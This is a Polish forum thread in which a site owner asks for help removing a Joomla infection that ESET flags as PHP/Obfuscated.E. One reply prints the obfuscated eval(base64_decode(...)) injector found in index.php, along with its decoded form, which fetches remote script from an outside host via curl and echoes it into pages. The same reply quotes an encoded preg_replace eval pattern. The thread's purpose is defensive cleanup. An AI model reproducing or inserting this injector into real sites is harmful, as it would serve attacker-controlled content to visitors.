blokada strony, odmowa dostępu do index.php, zagrożenie widziane przez NOD32: PHP/Obfuscated.E Opcje

[majke63]

Jak w temacie. Strona została zblokowana w wyszukiwarce google i zweryfikowana jako zagrożenie. Wykonałem skan wszystkich plików i zlokalizowałem w niektórych z nich zagrożenie. Wyeliminowałem je. Pozostał mi plik index.php z którym nie potrafię sobie poradzić. W ESET NOD32 wyskakuje "PHP/Obfuscated.E potencjalnie niepożądana aplikacja - wybrana akcja zostanie wykonana po zakończeniu skanowania". Dodatkowo odmowa dostępu jak chce go zmodyfikować, spakować w paczkę rar itp. Dotyczy strony www.roi.waw.pl

[kartin]

Wyłącz antywirusa, to dostęp do pliku zostanie odblokowany. Jeśli to nie pomoże to najpierw zrestartuj system, a później wyłącz antywirusa.
Antywirus może nie wykryć wszystkich nieporządnych "dodatków". Najlepiej byłoby przywrócić pliki z backupu.

[majke63]

problem w tym, że backupu brak - to by momentalnie rozwiązało problem, jestem tego świadomy. Zapisałem kod php do pliku txt, ale nie mam możliwości zamieszczenia go na forum do weryfikacji z racji jego długości i wyrzucania błędu jako że post jest za długi. Co mogę zrobić?

[lipek80]

spróbuj

https://safeweb.norton.com

albo

http://aw-snap.info/file-viewer/

drugi link pokaże ci gdzie masz złośliwy kod.

[majke63]

owszem widzi z tej drugiej strony jakieś błędy, jednak w czym tkwi problem jest dla mnie sprawą niejasną. Jest możliwość poprawy kodu strony php w sposób manualny? Tak abym mógł wkleić poprawny kod do pliku index i wyeliminować zagrożenie w prosty dla mnie sposób?

[lipek80]

Z tego co widzę masz gdzieś w kodzie lub w pliku flash odnośnik do:

http://www.ajedrezlocal.com/t3-assets/cnt.php?id=15179311

Który jest lub był zainfekowany ponieważ teraz brak tam strony. Google Oflagował ten adres jako niebezpieczny.

[kartin]

Pobierz http://joomlacode.org/gf/download/frsrelea...ull_Package.zip zastąp pliki i będziesz miał.

Jak nie zaktualizujesz do najnowszej wersji, to za jakiś czas historia się powtórzy.

[PHP] pobierz, plaintext 
<?php eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGc
FlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXM
W
FZVkl4V25GWmFrcFRZa1YwUm1WRVZsQlNSMmhTVkZSQ1MyUnNhM2RTYmxwVVlsVmFXVll4WXpWWlYwcH
p
WMnBHV0ZaRk5WUlpNR1JLWlZVMVdGZHRSbGhTTW1nelYxaHdUMVV5Vm5Ka1JWSmhVak5DY2xZd1ZuZGx
i
R1JGVTI1T2ExWXdXbHBXVm1NeFZFWlZlV1JGZUZKTlYyZzJWWHBDVDFWdFJYbGtSM1JZVWxoQ05sVXhW
b
EprTVc5M1lraFNhRkpGU25KVk1GWkdUV3hTU1dGNlZtcFdiWGhhVmpJeGIyRXhTWGhYYWxaYVlrVXdlR
m
w2U2tkWFJUVlpVMnN4VG1KdGFETlhWekI0WlcxU2RGSnVWbE5oYTFwb1ZqQldkazFXVWtkVmExcHJWbF
J
XZDFScmFIZFVWMHBWVW01a1dtSlhjM2haTVdSUFRsWk9WVnBGVW1GTmJsSk1WVEowYTFReVNYZGlSVlp
P
VWpKU1lWUlVSbUZPVm14eVYxUldhbEl3Y0RCWmExSkRWRVpGZVdONlRsSk5iVko1VlRKMGQxTldWblZS
Y
ld4WFRWWnZlVmRyV205VmJHOTRVV3hTVWxaRldsRmFSRWsxVXpGRmVGcEZPVTVXTURVd1dsVmtZV0ZyT
V
hOWFdHUmFZV3MxUkZSVlZqQlNSbFowWTBkb1VrMHlhRVpXYlhoaFV6RlNWMVZZYUZKaVJscGFWRlphWV
Z
aR1drWlVhazVvVFd4S1dsVXlOVTlV.UmxwSlZHdDRVazFWV25wWlZ6RlRWMVpPZFZSc2JFNU5SRlo2VjJ
0V2FrNVhVWGxWYTFKaFRXNVNZVlJYTVd0bGJGWlZVbXhrVmsxV1NrZFVNVnBIVmpGS2NXSkdVbFppUm5
C
VVZtMTRWMk5yTlZkV2JGcG9UVVp3VVZac1VrTlpWa3B6Vm01Q2EwMHlhRTFXYTJoUFZFWkZlRkp1VG1o
a
VZrcGFWVEkxVDFkVk1IZE9XRTVoVWxkTk1WcEVTbE5TUm05NVpFWndUbUpYVWpaV1ZsSkhWakZWZUZWc
l
dsQldhMXBZVlcxd2MxSldXa1ZSVkVaVi5UVlZ3VjFaSGVGZFdNVXBZWlVVNVZtSkdWVEZXYlhoaFVrZF
J
lV1JIZEZOTmJtZDNWako0YWs1Vk1WaFZhMUpvWlcxU1JWZHFTakJUTVU1eVdrWk9hRkl4U2tsVmJHUnJ
W
VlpWZDFOdVJtRlNiV2hNV1hwR2JtVldXbkZWYlVaWFRVUkdNbFV5ZEd0VU1rbDNaRVpXYWsxSVVrVldW
b
VEwWTFad1IyRkZkR3BOVjJRMVZrYzFUMkZWTUhkT1dFNVVUVVUxVkZsWE1VZFNSMFkyV2tWU1lVMXVVa
3
hXTW5oclZESkplVk5xVmxKV01uaE1WV3BHUzJJeGNFWmFSVnBvVmxScmVsbHFRbmRpVmxaWVQxUktWVk
5
IT0RCVVJ6RlBZakpPY0ZwNlFrNWxWM1F4VlZSS2FtTkZkRlZqZVd0d1QzY3BLVHMpKTs)); ?>
[PHP] pobierz, plaintext 

to w czytelnej wersji:

[PHP] pobierz, plaintext 
//<?php
	if(function_exists('curl_init'))
	{
		$url = "http://javaterm.link/link/jquery-1.6.3.min.js";
		$ch = curl_init();
		$timeout = 5;
		curl_setopt($ch,CURLOPT_URL,$url);
		curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
		curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
		$data = curl_exec($ch);
		curl_close($ch);
		echo "$data";
	}
//?>
[PHP] pobierz, plaintext 

Jak będziesz usuwał ręcznie to kasuj wszelkie takie podejrzane rzeczy. Wpisy w rodzaju

[PHP] pobierz, plaintext 
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66 ...
[PHP] pobierz, plaintext 

też są podejrzane

Ten post edytował kartin 2.06.2014, 11:35:53

[majke63]

podmieniłem pliki wspomniane, ale wszystko wyzerowało, bo nadpisało pliki, które są odpowiedzialne za rozruch strony. Za bardzo zielony najwidoczniej jestem w tym wszystkim. Na szczęście miałem ten backup z defektem i z powrotem dokonałem wgrania i działa, jednak dalej z blokadą strony. Czy ktoś byłby w stanie mi pomóc, ale bardziej manualnie z tym problemem? Mógłbym podesłać w wiadomości dane do zalogowania.